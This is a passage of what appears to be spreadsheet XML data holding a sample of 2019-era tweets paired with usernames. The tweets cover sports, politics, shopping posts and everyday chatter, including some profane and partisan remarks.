    <t>@jonschr @bamadesigner @mor10 It’s Envira specifically. Their light boxes can’t be tabbed into at all. Also if Soliloquy is also on a page, the arrow keys don’t work in the light box</t>
  </si>
  <si>
    <t>spicyplayoffp</t>
  </si>
  <si>
    <t>The return was legendary. The performances, especially in the postseason, were surreal. Thank you @MStrooo6 for the memories and the fun.</t>
  </si>
  <si>
    <t>OwenGmanOsborn1</t>
  </si>
  <si>
    <t>Financial help desperately needed to cover insurance costs due to cancer so treatment can continue! https://t.co/Qx2ergMNzw</t>
  </si>
  <si>
    <t>_suckmybeautyxo</t>
  </si>
  <si>
    <t>I thought car hunting was the worst, until I started apartment hunting.</t>
  </si>
  <si>
    <t>ash_meza</t>
  </si>
  <si>
    <t>Check out what I just added to my closet on Poshmark: Prana NWT Hawaiian Floral Racerback Tank Top Sz XL. https://t.co/DhnzsC0lvJ via @poshmarkapp #shopmycloset</t>
  </si>
  <si>
    <t>ShesaLoadedGun</t>
  </si>
  <si>
    <t>Got to blame on juice. @ Rams Head Live https://t.co/fowDaLFAHi</t>
  </si>
  <si>
    <t>MrsCoachMojica</t>
  </si>
  <si>
    <t>@jmarshallrams @MackeySpeaks Thank you for the easy access for our parents!!</t>
  </si>
  <si>
    <t>MRWmagazine</t>
  </si>
  <si>
    <t>Larac chief executive Lee Marshall tells MRW his views on first piece of scrutiny the resources and waste strategy has faced since its launch. https://t.co/YZYxIrYKYm</t>
  </si>
  <si>
    <t>DKuyke</t>
  </si>
  <si>
    <t>@CindyKendrick11 Hilarious! Sounds like the beginning of a joke....</t>
  </si>
  <si>
    <t>MEMELOVINHOE</t>
  </si>
  <si>
    <t>@OGBLVCK_WAVE WHAT how? they literally have similar storylines (mental illnesses, drug addiction, lgbtq relationships, dysfunctional families) and they have similar age groups???????</t>
  </si>
  <si>
    <t>Marteenooo</t>
  </si>
  <si>
    <t>@AJBM17 @alexprestage @BalfourJ @BillyWinchester @HiJoelSmith I read Alex's tweet and knew you were gonna respond something gross</t>
  </si>
  <si>
    <t>Joseph_Palmer</t>
  </si>
  <si>
    <t>@FairMindedFaith The destruction of the Jerusalem temple in 70 CE (Which lead Mark to invent his gospel) is far better attested, see: https://t.co/Uu5mm4DWtc</t>
  </si>
  <si>
    <t>Factor75</t>
  </si>
  <si>
    <t>🍅 🍤 🥬 Fresh shrimp served over braised kale, onions and garlic, then topped with our creamy tomato sauce! ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ Try our creamy Tomato Garlic Shrimp: https://t.co/csbEmzwDLJ⠀ #MealDelivery #Italian #Garlic #Shrimp https://t.co/Y6Jc7kAJ1w</t>
  </si>
  <si>
    <t>rosegoldlining</t>
  </si>
  <si>
    <t>Happy, happy birthday to this lovely lady who I get to call “mom.” I still don’t think it’s fair that she didn’t share her “forever young” genes with me but whatevs. I still love ya, @ingridable! #birthdaygirl #birthdaywishes https://t.co/zd70L4RN1V</t>
  </si>
  <si>
    <t>AshleiJune</t>
  </si>
  <si>
    <t>Check out what I just added to my closet on Poshmark: ❗SALE🆘TREND Multi Snake Crossbody. https://t.co/SxObhxkwLH via @poshmarkapp #shopmycloset</t>
  </si>
  <si>
    <t>ThisisVishuz</t>
  </si>
  <si>
    <t>@MsDyna85 Lol, that Jamie Foxx tweet was the last straw lol</t>
  </si>
  <si>
    <t>etherealtaron</t>
  </si>
  <si>
    <t>@lovelydjhh so at first u think it’s gonna be gross then u actually try it and it’s good</t>
  </si>
  <si>
    <t>TheHaleHouseHC</t>
  </si>
  <si>
    <t>Just added Rye, For A Select FEW by #ComponentBeer to our menu https://t.co/azp7Y1ug6c</t>
  </si>
  <si>
    <t>DanNeidle</t>
  </si>
  <si>
    <t>@iaincampbell07 @JudithFreedman Not a planning lawyer, but yes - I believe you can apply for planning permission for land you don’t own. And why not?</t>
  </si>
  <si>
    <t>grahamonteith</t>
  </si>
  <si>
    <t>@Redx97_SB @mmaballer13_ @TheNotoriousMMA If you beat the guy, you become the guy. Took a 10yr reign with 1 punch.</t>
  </si>
  <si>
    <t>eliasmccall02</t>
  </si>
  <si>
    <t>#DemocraticDebate2020 Favorite moment (very misquoted): Bernie: Medicare for all will finally cover hearing aids, dental, and (I can’t remember) Jake Tapper: you don’t know that Bernie: I know that, I wrote the damn bill</t>
  </si>
  <si>
    <t>KyleAMadson</t>
  </si>
  <si>
    <t>The A’s fielded a VERY tiny lineup today https://t.co/5wiXZ8wPQS</t>
  </si>
  <si>
    <t>TP___oww</t>
  </si>
  <si>
    <t>@Deeinthacut @Trae9Fly Man lmk the location we there</t>
  </si>
  <si>
    <t>Jamiee_rosem</t>
  </si>
  <si>
    <t>When Jordan tries to steal Ovies girl 😂 #loveisland https://t.co/TEGUwTRdcE</t>
  </si>
  <si>
    <t>A_Stramash</t>
  </si>
  <si>
    <t>@FalkirkFC One for @linzerellasmith</t>
  </si>
  <si>
    <t>neeberton</t>
  </si>
  <si>
    <t>i am listening to strategic grill locations for the millionth time. but its been a while since i dove into some mitch hedberg</t>
  </si>
  <si>
    <t>sinnerhouse</t>
  </si>
  <si>
    <t>@Cranky_Tanky i knew this and yet i continue to be a fool 😔</t>
  </si>
  <si>
    <t>Kennybaker85</t>
  </si>
  <si>
    <t>@BillKristol You helped dupe our leaders, and thus the nation, into Iraq. Didja win that?</t>
  </si>
  <si>
    <t>MysteBright</t>
  </si>
  <si>
    <t>It works well for its size, but it's not big enough to be practical for daily use. But this would ma https://t.co/pa78uZsR3m</t>
  </si>
  <si>
    <t>telegraph_sport</t>
  </si>
  <si>
    <t>Anyone who has followed the trials and tribulations of Jake Trbojevic and Nick Cotric can see the match review committee has lost its way and this starts at the top, writes Paul Kent. https://t.co/mk4SDalvu2</t>
  </si>
  <si>
    <t>KingTara_</t>
  </si>
  <si>
    <t>one person followed me and one person unfollowed me // automatically checked by https://t.co/DGbmFJczpC</t>
  </si>
  <si>
    <t>coconutricebear</t>
  </si>
  <si>
    <t>Need to find new hoomans who can actually follow my schedule! Who wants the job? https://t.co/6sFm5rzPvc</t>
  </si>
  <si>
    <t>genetroyer</t>
  </si>
  <si>
    <t>The devil and our society have created this stigma that the church just wants money. It's sad, because it's stealing the joy that you get from giving. @bradformsma https://t.co/wsqE5RK5Kn via @cnieuwhof</t>
  </si>
  <si>
    <t>J_Hernandez91</t>
  </si>
  <si>
    <t>My parents are immigrants I’d be damn if I made their sacrifices be for nothing.</t>
  </si>
  <si>
    <t>gar5061</t>
  </si>
  <si>
    <t>Seriously!?! #rockstar #coolcat #musicians #talent #yyt #nl #newtownie @ St. John's, Newfoundland and Labrador https://t.co/pSl3D1u7mJ</t>
  </si>
  <si>
    <t>CreatedByAxe</t>
  </si>
  <si>
    <t>Trying something new to see if i can make it work. Putting Gesso on watercolor paper to use acrylic paint on. We will see how it turns out. Keep you posted. #Artist #becreative #newthings #Artistmom https://t.co/RbV1wLRJVn https://t.co/UR7mspxsx7</t>
  </si>
  <si>
    <t>DBCooper_71</t>
  </si>
  <si>
    <t>@brazilegend10 @angelcakepics @LFC @LFCHistoryShow @LFChistory I've heard on the strength of their 0-0 1st leg result at Anfield Bayern printed travel arrangements for the Paris final in their programme ahead of the return leg.</t>
  </si>
  <si>
    <t>MrsMcGeek</t>
  </si>
  <si>
    <t>Ever heard of turducken? Well, 2_Shoes and I now have beefenbacon. We got the idea from @azaugust, @Spetnix and Polosage. Gotta say, the best part of doing this strategy was when the cow minion looked up at the chicken minion and said, “What’s up?” That was truly epic!! https://t.co/1jWK9HUZcn</t>
  </si>
  <si>
    <t>saltymikan</t>
  </si>
  <si>
    <t>Ah, the cute couple of Kaguya and Miyuki ♡ good anime ☺︎ #kaguyasamaloveiswar https://t.co/B7bfIvxEph</t>
  </si>
  <si>
    <t>dispensaryexch</t>
  </si>
  <si>
    <t>It is really sastifying to build websites for my clients and do there SEO and then start seeing the orders roll in from ALL over the world . Or for my local clients to see thousands of dir request per month. https://t.co/2b0NU1Abiu Website and SEO by https://t.co/PWwcOjzLs6 https://t.co/QkmzFrLWi9</t>
  </si>
  <si>
    <t>GasPasser99</t>
  </si>
  <si>
    <t>@GeoffMosherNFL Has to be a large package!!</t>
  </si>
  <si>
    <t>fine_apple__</t>
  </si>
  <si>
    <t>But when I stepped on the LEGO it was OV</t>
  </si>
  <si>
    <t>LisaNicolegs1</t>
  </si>
  <si>
    <t>Excited to share this item from my #etsy shop: Tocara "Beth" posts earrings set diami sterving silver rohdium plated #jewelry #earrings #silver #cartilage #pushback #no #unisexkids #zircon #clear https://t.co/ZFZuXqjLOt https://t.co/3UPmAndZr0</t>
  </si>
  <si>
    <t>KristyDyson</t>
  </si>
  <si>
    <t>@mrstu69 I’m not actually there yet. I’m waiting to go. Which is worse. Waiting to go to work at 10pm at night is definitely the worst thing ever.</t>
  </si>
  <si>
    <t>hotfortacos</t>
  </si>
  <si>
    <t>Corralejo is now my go to tequila don’t at me</t>
  </si>
  <si>
    <t>DerekHousman</t>
  </si>
  <si>
    <t>Trying to type and learn hand wrapping techniques for boxing is hard, this took 27 minutes to type.</t>
  </si>
  <si>
    <t>thenetlines</t>
  </si>
  <si>
    <t>The Untold Truth of Margot Robbie’s Husband, Tom Ackerley https://t.co/QpjPLYtkPC</t>
  </si>
  <si>
    <t>BaldurBarons</t>
  </si>
  <si>
    <t>@DoubleBarDFarms @T_Bartman @allansoutar @weber4farms That’s huge. Ours are just over 400 I believe. Man that’s a lot of weight up there.</t>
  </si>
  <si>
    <t>dreamrsldy</t>
  </si>
  <si>
    <t>@realDonaldTrump You are the absolute worst, you are why we are the laughing stock, you are an insecure, obtuse, moronic POS</t>
  </si>
  <si>
    <t>MarkPinnix</t>
  </si>
  <si>
    <t>@Tpeee60 @EdgewoodTom @randy_mcturnan @JustDawnM @heyitsCarolyn @MakeCaliRed @Jdubsteg @tstephens505 @Serremmy @well_learn @dhoyt62 @tslanning @msjeannerogers @Nobodybutme17 @Lindaga52597147 @FelixAnchor__ @DGurL12345 @JohnUnd82796264 @copfunnywife @KvMidd85_ @ROHLL5 Ham grease and coffee. Its good over eggs and homeade biscuits.</t>
  </si>
  <si>
    <t>josephPGb97</t>
  </si>
  <si>
    <t>I’m ready for cold weather 🙂</t>
  </si>
  <si>
    <t>sendintheclown4</t>
  </si>
  <si>
    <t>@Johnny_Joey @krauthammer Oh how I miss his wit and intellect! I Would love to here his perspective on the squad, Mueller, Pelosi and so much more.</t>
  </si>
  <si>
    <t>Gwen2099</t>
  </si>
  <si>
    <t>You wish you could move faster today, but random circumstances... More for Aquarius https://t.co/oLKGcQjbZB</t>
  </si>
  <si>
    <t>AlwaysLearnWeb</t>
  </si>
  <si>
    <t>@MissEvsEngTwit that's the goal!</t>
  </si>
  <si>
    <t>PetalNyeri</t>
  </si>
  <si>
    <t>So good I had to share! Check out all the items I'm loving on @Poshmarkapp from @Megan15197 #poshmark #fashion #style #shopmycloset #nike #anthropologie #taylor: https://t.co/4y4T84Rwvs https://t.co/pEBypAmeUq</t>
  </si>
  <si>
    <t>SIGmudgee</t>
  </si>
  <si>
    <t>Sculptures in the Garden 2019 Catalogue - https://t.co/ZM0yGObo7M https://t.co/beZh0TzmgH</t>
  </si>
  <si>
    <t>Keith_McPherson</t>
  </si>
  <si>
    <t>@kellybergin yea if you don’t have plans def come thru. my mom and i would love to meet you. i’ll be calling the whole game as well 😊</t>
  </si>
  <si>
    <t>gillystevas</t>
  </si>
  <si>
    <t>@cookhamcockapoo Sadly dogs aren’t welcomed in as many places - maybe due to the weather. But regardless, it hampers is in comparison to our experience of Portugal</t>
  </si>
  <si>
    <t>seniormeows</t>
  </si>
  <si>
    <t>Cowboys lose 3 straight, hate to see it</t>
  </si>
  <si>
    <t>lordchariot</t>
  </si>
  <si>
    <t>@dbongino I'd love to see Beto at the end of the line trying to buy them back.</t>
  </si>
  <si>
    <t>LaceyWilson4</t>
  </si>
  <si>
    <t>@Wittwering @SarahCalise @mspleahlax Thank you I had forgotten that they were called DBQs my class didn’t make it to Vietnam at all pre-exam</t>
  </si>
  <si>
    <t>Evilgenius68</t>
  </si>
  <si>
    <t>@thatgirlsuttin Depends are they married or just splurging on the HMS</t>
  </si>
  <si>
    <t>CDennett</t>
  </si>
  <si>
    <t>@UResistance @IrishEurophile @LBC Liverpool is part of England and if you have a problem with England or English people you're free to leave whenever you want and good riddance.</t>
  </si>
  <si>
    <t>Coug4094</t>
  </si>
  <si>
    <t>@hbryant42 Only going with the defense presented.</t>
  </si>
  <si>
    <t>Bodyiconz</t>
  </si>
  <si>
    <t>Gucci driving me crazy in this bed and I still haven’t work yet 🙄</t>
  </si>
  <si>
    <t>sugamon_project</t>
  </si>
  <si>
    <t>Please everyone, take care of yourselves. And take care of each other. Check up on your friends when you can. The kpop community in particular has a long way to go on learning how to love each other. Think before you send those hate comments. 💜 RIP, Sulli 💜 Sending love 💜</t>
  </si>
  <si>
    <t>teammick</t>
  </si>
  <si>
    <t>Yeah I bet Deans looking for a 40 year old, mother of three................not lol!! #firstdateshotel https://t.co/KdoxHRLrw0</t>
  </si>
  <si>
    <t>Toytoydiva</t>
  </si>
  <si>
    <t>My favorite was @RaeKhalil I can’t believe she got eliminated because I know she would’ve had one of the dopest video concepts and I wanted to see it #disappointed #RhythmAndFlow</t>
  </si>
  <si>
    <t>hattiewwe</t>
  </si>
  <si>
    <t>5 people followed me and 2 people unfollowed me // automatically checked by https://t.co/zjFtFr9o35</t>
  </si>
  <si>
    <t>efyko</t>
  </si>
  <si>
    <t>Never lose a backyard battle to your neighbor enemies again! Use this Super Commando Gatling Gun. The Machine Gun fires up to 18 darts in less than 18 seconds. And it has fully automatic shooting capabilities for enhanced "carnage". https://t.co/JfgJtoS7IH #EK</t>
  </si>
  <si>
    <t>Sarah_Sullivan9</t>
  </si>
  <si>
    <t>My brother sent me a video asking if it was normal to eat cereal for every meal, and I had just gotten home from buying cereal and milk for breakfast tomorrow morning 😂 sibling telepathy?!</t>
  </si>
  <si>
    <t>uniphotography</t>
  </si>
  <si>
    <t>Ep. 328: Oh Dear! New Gear! – and more! https://t.co/b9iOKxkmPO</t>
  </si>
  <si>
    <t>essaywriter9_</t>
  </si>
  <si>
    <t>@lkelahan Don't worry, we're here for you, #Essay |#Homework | #Researchpaper| #Assignment 📧 prowritersusa@gmail.com ⬇budget 💯 Legit 🅰Quality ⌚Delivery</t>
  </si>
  <si>
    <t>bunker_monkey</t>
  </si>
  <si>
    <t>@NNUH Thank you for taking care of my wife back in 2012.</t>
  </si>
  <si>
    <t>SAW1204</t>
  </si>
  <si>
    <t>@roxyoak @DemInOhio Come to Canada!! We would love to have you. It would be an honour.</t>
  </si>
  <si>
    <t>noalpha</t>
  </si>
  <si>
    <t>Today would probably be a good day to work on my genealogy. Been rather lazy and distracted recently.</t>
  </si>
  <si>
    <t>AFootballFriend</t>
  </si>
  <si>
    <t>Hey @YahooFantasy - When are you finally going to change your website so that if you only have 1 kicker/defense on your team they automatically default into your active lineup as opposed to the bench? #FantasyFootball</t>
  </si>
  <si>
    <t>execheadhunters</t>
  </si>
  <si>
    <t>Recruiting senior roles can be an expensive activity if you get the appointment wrong. Here is a FREE guide to ensure you set up for success https://t.co/rsmdPXbvIr #executivesearch #recruitment #recruiting #hiring</t>
  </si>
  <si>
    <t>_co_li_bri</t>
  </si>
  <si>
    <t>@publicintegrity @TNsmartgal @theintercept @GavinNewsom , please tell the residents of California more about the $200000 campaign contribution you received from @PGE4Me ? It’s all well and good to make speeches, how about returning the cash, or better yet donating it to victims of @PGE4Me’s wildfires? https://t.co/gISDhO616N</t>
  </si>
  <si>
    <t>the_snackpinata</t>
  </si>
  <si>
    <t>I cast my Heisman ballot for #JustinFields! Click the player you think deserves the Heisman House vote. (📍@NissanUSA)</t>
  </si>
  <si>
    <t>WendyCorduroy23</t>
  </si>
  <si>
    <t>@Trudermark I let my dog sleep in my bed and give her a doggy cake on her birthday, is that good enough?</t>
  </si>
  <si>
    <t>BrotherBear_0</t>
  </si>
  <si>
    <t>I really hate to defend donald trump.. But did joe biden forget about George Bush, or George W. Bush when it comes to foreign policy? #DemocraticDebate</t>
  </si>
  <si>
    <t>belenart_</t>
  </si>
  <si>
    <t>HEY ALL!! I’m opening up shoe customs!! 💖🌟🥳 Here’s some examples of my work: https://t.co/8m6joxP4J2</t>
  </si>
  <si>
    <t>Pinkolol16</t>
  </si>
  <si>
    <t>i woke up 2 hours later than intended because i left my ds underneath my bed and i turned it off in my sleep again, because i don't remember hearing it</t>
  </si>
  <si>
    <t>CryptoPar2</t>
  </si>
  <si>
    <t>@roflcopterftw You realize you are now encouraging your followers to target/reply to specific accounts. Exactly what you are accusing others of doing. 😏</t>
  </si>
  <si>
    <t>GeGeDior__</t>
  </si>
  <si>
    <t>Slim bouta be GUH AS SHIT tho watch 😂🤷🏽‍♀️ ain’t bouta be talking to shawty nomore .</t>
  </si>
  <si>
    <t>gerllew2</t>
  </si>
  <si>
    <t>@AVMitchell2010 A referendum is the only option</t>
  </si>
  <si>
    <t>PhoenixRyanTV</t>
  </si>
  <si>
    <t>@SuikodenRevival Surely Bolgan should get it for appearing to have the muscle capacity to inflict huge amounts of damage but actually being a complete waste of space 🤣</t>
  </si>
  <si>
    <t>FrankHaydn</t>
  </si>
  <si>
    <t>@guardian Now that Bernie has the endorsements of an outspoken anti-Semite and a “progressive“ legislator, both of whom loathe the United States yet somehow got elected to Congress, I guess he can pack it in and enjoy retirement.</t>
  </si>
  <si>
    <t>maureenreneee</t>
  </si>
  <si>
    <t>@ChueyHeadass Go to SKREEP</t>
  </si>
  <si>
    <t>BottomleyWheres</t>
  </si>
  <si>
    <t>@angelaeagle The same process implemented by Labour in Northern Island? https://t.co/ZkGmFmEUSs</t>
  </si>
  <si>
    <t>pfdhome1</t>
  </si>
  <si>
    <t>@TheBabylonBee Anyone who disagrees with Hillary is labeled a Russian bot or influenced by Russians. I think she has some kinda psychotic fascination with Russians. But that SO many ppl believe her nonsense is more alarming. Now it's Tulsi. I'm sure if Sanders kept the lead in 2016 it'd be him.</t>
  </si>
  <si>
    <t>AlexNackman</t>
  </si>
  <si>
    <t>I realize I’m 10 years late, but Lester from The Wire is the shit. @HBO</t>
  </si>
  <si>
    <t>IshYaBoiBear</t>
  </si>
  <si>
    <t>Everyone Has The Same 24 Hours In A Day , Be Great People 💯</t>
  </si>
  <si>
    <t>LallyMacBeth</t>
  </si>
  <si>
    <t>@rebeccamjohnson Ah this was excellent morning reading - very much enjoyed your take on archival processes, it’s always very funny and charming having to go through them. Oh and the tomatoes sound wonderful - tomorrows brekkie!</t>
  </si>
  <si>
    <t>Bwillz97</t>
  </si>
  <si>
    <t>Herro surprised me a lot with his playmaking abilities in the summer league, i think it can translate well in the Reg season. Added spacing this year will help that too</t>
  </si>
  <si>
    <t>JarrodHanley</t>
  </si>
  <si>
    <t>@atxpumpkinhead @therealstubeans @CordCuttersNews @ATT @hulu @YouTubeTV I switched to youtube tv and philo. Kept max package channels and overall both are great platforms. Takes a few days bouncing between the two but overall awesome</t>
  </si>
  <si>
    <t>GabrielBueno775</t>
  </si>
  <si>
    <t>@SaKenMadRaj Don’t do it stick to cod mobile if you have an itch 👍</t>
  </si>
  <si>
    <t>Stukhov</t>
  </si>
  <si>
    <t>@PoulChapman I want to know how many apartment buildings he has canvased</t>
  </si>
  <si>
    <t>Bayyyleaf</t>
  </si>
  <si>
    <t>Breath of the wild is a GORGEOUS game and absolutely DESTROYED me emotionally</t>
  </si>
  <si>
    <t>hcheng13</t>
  </si>
  <si>
    <t>@realDonaldTrump Fixed it for you. "America first in line to do the biddings of Master Putin."</t>
  </si>
  <si>
    <t>jhutson102</t>
  </si>
  <si>
    <t>@Wishful_wink Or just don’t lie to start with!! I know, believe me I know, “easier said than done” but the day will come when you can’t remember the lies so start working on it!!</t>
  </si>
  <si>
    <t>thearmedfarmer</t>
  </si>
  <si>
    <t>My early 2.8-3.3 beans have pretty much had double the yield my 3.5-3.9 beans have had. So yea, fun fact. #Harvest19</t>
  </si>
  <si>
    <t>nonstopeurotrip</t>
  </si>
  <si>
    <t>@Bloomiferous @moo2n @LBC @clivebull I do things (no red meat, train instead of fly) I don't sit in a street and cause untold cost and time to fellow citizens and take police away from where they're needed...</t>
  </si>
  <si>
    <t>HubbUKArtists</t>
  </si>
  <si>
    <t>This is the upcoming release by @SandraAndMatty https://t.co/6ArW5lobjk https://t.co/MAazemX1Am</t>
  </si>
  <si>
    <t>DDandDpodcast</t>
  </si>
  <si>
    <t>@virgoasfuck @Id0that @dungeonsanddads Hey thanks for recommending us! We really appreciate it when fans like our work enough to suggest it to someone else!</t>
  </si>
  <si>
    <t>dogfan411</t>
  </si>
  <si>
    <t>@MagicGirlJosie 😱😱 who! I had a friend performing too, Anita darling who danced to fall out boy</t>
  </si>
  <si>
    <t>Sandysky3</t>
  </si>
  <si>
    <t>@lynsys57 Oh how much I love that man and miss him ⚡💔❤⚡❤</t>
  </si>
  <si>
    <t>d_nayjassia</t>
  </si>
  <si>
    <t>I’m about to take my ass to this bank, and then come back home &amp; chill.</t>
  </si>
  <si>
    <t>Daivmon</t>
  </si>
  <si>
    <t>@jonathansfrakes He named the dog Number One</t>
  </si>
  <si>
    <t>goodnightandari</t>
  </si>
  <si>
    <t>@festivelukeyy @lauvsongs LITERALLY I SAW THIS AND THOUGHT OF U</t>
  </si>
  <si>
    <t>gIancysamantha</t>
  </si>
  <si>
    <t>My life now revolves around Jay1 and AJ Tracey x</t>
  </si>
  <si>
    <t>__ukr__</t>
  </si>
  <si>
    <t>ima set myself up and watch candy man on Netflix 🤣</t>
  </si>
  <si>
    <t>illegalrealms</t>
  </si>
  <si>
    <t>Travis and Kylie splitting shouldn’t be trending because honestly that’s not a problem we as an entire human race should worry about. There are so many towhee things to worry about.</t>
  </si>
  <si>
    <t>RobRocstarr</t>
  </si>
  <si>
    <t>@nwa powerr is awesome....Love the throwback set and the presentation. This is awesome</t>
  </si>
  <si>
    <t>elevatorgodva</t>
  </si>
  <si>
    <t>@deedles5461 @Rosie Democrats don’t investigate. You create a conclusion then invent the “evidence” to support it. As proven in this latest smear that only exposed Biden’s criminal corruption in your desperation to effect a coup against your President.</t>
  </si>
  <si>
    <t>Vanessab15</t>
  </si>
  <si>
    <t>@_hurtsa We share an office, I’ll be nice and quiet.</t>
  </si>
  <si>
    <t>etanniehill</t>
  </si>
  <si>
    <t>The Salon has moved..... https://t.co/GTCmBDLctJ</t>
  </si>
  <si>
    <t>mrmayormccatV2</t>
  </si>
  <si>
    <t>@6ixVMG Yo I would listen to the song with that beat a whole year straight 6ix</t>
  </si>
  <si>
    <t>EnglandOverAll</t>
  </si>
  <si>
    <t>@JamesJo76415286 @SirTrevSkint How about JRM this time. Then surely the Tories will be the party of Brexit! 😂🤣😅</t>
  </si>
  <si>
    <t>JonReid06439454</t>
  </si>
  <si>
    <t>@realDonaldTrump Diversionary tactics...you were the meltdown: Democrats say Trump had a 'meltdown' at White House meeting https://t.co/9bEMSqJDhg</t>
  </si>
  <si>
    <t>Datnurse</t>
  </si>
  <si>
    <t>@TrumpWarRoom @realDonaldTrump I say let’s look into the Trump kids businesses with China!</t>
  </si>
  <si>
    <t>CarlosdelRio7</t>
  </si>
  <si>
    <t>Final #IDBugBowl19 question is Fungal infections. A new species of this pathogenic dimorphic endemic fungus was recently recognized in North America. A different species of this genus is a common dimorphic fungal infection in South Africa. What is the answer? https://t.co/GArgxS5c8o</t>
  </si>
  <si>
    <t>Shannn_I_Am</t>
  </si>
  <si>
    <t>Jump-starting stalled financial and business plans enhances yo... More for Pisces https://t.co/WmIJm75G5J</t>
  </si>
  <si>
    <t>JohnWoo19092374</t>
  </si>
  <si>
    <t>@reddogsusie @MY_BORDERCOLLIE Please keep us posted on the dog. I'm so sorry 💔 for it. @LisaVanderpump</t>
  </si>
  <si>
    <t>DawnHosmer7</t>
  </si>
  <si>
    <t>@TheImprovisor I'm so sorry. You have my empathy and I can completely relate as someone who has to have yearly colonoscopies. The prep is pure hell!</t>
  </si>
  <si>
    <t>oshofrankland</t>
  </si>
  <si>
    <t>Watching this game is pretty grim tbh. No players should have to put up with that shit.</t>
  </si>
  <si>
    <t>British_Hotties</t>
  </si>
  <si>
    <t>Just had an awesome chat and cam with the gorgeous @BUSTY_MIA_XXX Guys you really need go and check her out 👉🏻 https://t.co/6rAvy2DyFU https://t.co/nukgJRcbbD</t>
  </si>
  <si>
    <t>jodivic</t>
  </si>
  <si>
    <t>@ryanjasonx Don't need to. I took the very first one if you. Only a few hours old. Fresh out the womb! 💙 https://t.co/opw9lwycJ4</t>
  </si>
  <si>
    <t>zaido622</t>
  </si>
  <si>
    <t>@Miiigggsss22 Luh siya. You're a good man. Bat may pagganun? It's not about whether you're good for me or not. In the first place, do we have matching expectations? Is what you want, also what I want? Di ba? 😅</t>
  </si>
  <si>
    <t>kathy_farnboro</t>
  </si>
  <si>
    <t>@rescuedogdexter And in the sunshine 😍 think Mr sun has gone on holiday up here, just rained all week! Next week too seemingly. 😥🙄</t>
  </si>
  <si>
    <t>TheBr0die</t>
  </si>
  <si>
    <t>I cast my Heisman ballot for #TuaTagovailoa! Click the player you think deserves the Heisman House vote. (📍@NissanUSA)</t>
  </si>
  <si>
    <t>monettechris</t>
  </si>
  <si>
    <t>Ophelia's first election! I took her into the polling booth with me, then she put the ballot in the box herself. Papa was so proud. Get out and vote, people! Our future depends on it. #cdnpoli #polcan #ItsOurVote https://t.co/LgKkynZC8N</t>
  </si>
  <si>
    <t>KingKeyyyy</t>
  </si>
  <si>
    <t>Set a standard and stand on it . Don’t settle to match levels or energy.</t>
  </si>
  <si>
    <t>HP_TaoSenai</t>
  </si>
  <si>
    <t>@CoreyTaylorRock @Vengenz1 @Disturbed @NFL This man is a better vocalist than most of the people who did the Super Bowl</t>
  </si>
  <si>
    <t>Timpolkovitz</t>
  </si>
  <si>
    <t>@bonesy_2 @mgrant76308 Then I assume you noticed most the the Democrat leadership look like cartoon characters... AOC to Pelosi ... most of them dumber than a box of rocks... like Hank Johnson thinking Guam will capsize🤪 I can only imagine the IQ level of the populace electing these morons</t>
  </si>
  <si>
    <t>SithLord29</t>
  </si>
  <si>
    <t>@Suzee_Fett Happy First day Of October to you also! This will be a great month. My birthday will be next Wednesday and Modern Warfare comes out in 25 days!</t>
  </si>
  <si>
    <t>yasmineherrera6</t>
  </si>
  <si>
    <t>Before this day ends I just want to take the time and say FUCK CHRSTPHR CLMBS!!!! He doesn’t deserve the vowels</t>
  </si>
  <si>
    <t>CosoroRadio</t>
  </si>
  <si>
    <t>#Jammin' DJ Spinall ft. Kojo Funds (@DJSPINALL) (@KojoFunds) - What Do You See Listen on DAB Radio around Manchester UK | on Alexa Skills | on Mobile Apps | and online https://t.co/SJfcx4UFmu #AfroBeatRadio #CosoroRadio</t>
  </si>
  <si>
    <t>isreallytwodogs</t>
  </si>
  <si>
    <t>One year I went to Gencon and forgot to pack my shirts. They were waiting for me on my bed when I got home. I ended up wearing a friend's shirt, who was significantly bigger than me, for the first day and bought cheap/clearance shirts to get me through the weekend.</t>
  </si>
  <si>
    <t>conservdmc</t>
  </si>
  <si>
    <t>@Timcast Women like the feminists who are going bonkers on you, are totally bitter are taking out their regret on you. I made choices in my life that I now need to live with. I admit, it's hard realizing that in my position, my choices for a mate are pretty slim....</t>
  </si>
  <si>
    <t>PawzOff</t>
  </si>
  <si>
    <t>@aumieI The movie isnt going to disappear. You can still watch it everyday - even tho i highly doubt any of u even thought about it until this reboot announcement. Also maybe wait until the new one comes out before dragging?!</t>
  </si>
  <si>
    <t>NorsePole567</t>
  </si>
  <si>
    <t>@ourcongressucks @HollyWilhelm4 @Melski1 Time to Open BHO’s Sealed Files.</t>
  </si>
  <si>
    <t>erinecooperx</t>
  </si>
  <si>
    <t>@meg_glennx @caolan_wilson @jadesweeneyx @KatieVerityxo Away from the firing line</t>
  </si>
  <si>
    <t>Paula312jane</t>
  </si>
  <si>
    <t>@_CrazyHorse69 @clemente_carl I remember they brought it out in 2 halves always wanted to see a washing machine on centre circle when we went to candy🤣</t>
  </si>
  <si>
    <t>JobBlob3</t>
  </si>
  <si>
    <t>@Fantasy4Twenty Only in the summer at the lake</t>
  </si>
  <si>
    <t>WaltCorey</t>
  </si>
  <si>
    <t>@waltshaub It can truly be said @realDonaldTrump created ISIS. Ya know, back in the day we'd have called Trump shit-for-brains.</t>
  </si>
  <si>
    <t>MaxWinebach</t>
  </si>
  <si>
    <t>@PetarGemovic No, I've experienced more bugs on iOS than I have Android. People always say I'm lying, but I'm not. I've had more app crashes, more connectivity issues, more just random shit bugs throughout the OS that I can't ignore. Android has fewer.</t>
  </si>
  <si>
    <t>GeorgeElder</t>
  </si>
  <si>
    <t>Can we all agree that this whole accusation by #TraitorTrump on Bidens getting sweet deals from Ukraine is because that is what the Trumps would do. It classic projection. And now he’s getting impeached along with @VP and Pompeo too.</t>
  </si>
  <si>
    <t>benjoseph96</t>
  </si>
  <si>
    <t>@DavidMercatali @TORtheatre @TessBerryHart @DanAtticus @MDHolmquist @GeorgeSoave21 @SamanthaAliceJo Hoping to catch it in week 2! Looking forward to it! All the best with the previews ☺️</t>
  </si>
  <si>
    <t>Valdeana</t>
  </si>
  <si>
    <t>I made it 12K on this video 💕 A big thank you to everyone who supports my channel 🥰😘 https://t.co/ddRrutfqse</t>
  </si>
  <si>
    <t>thetruthave</t>
  </si>
  <si>
    <t>@HillaryClinton OMG just can’t stop throwing up. You two are some sick individuals trying to sell this happy couple to us.</t>
  </si>
  <si>
    <t>Marcelleous1</t>
  </si>
  <si>
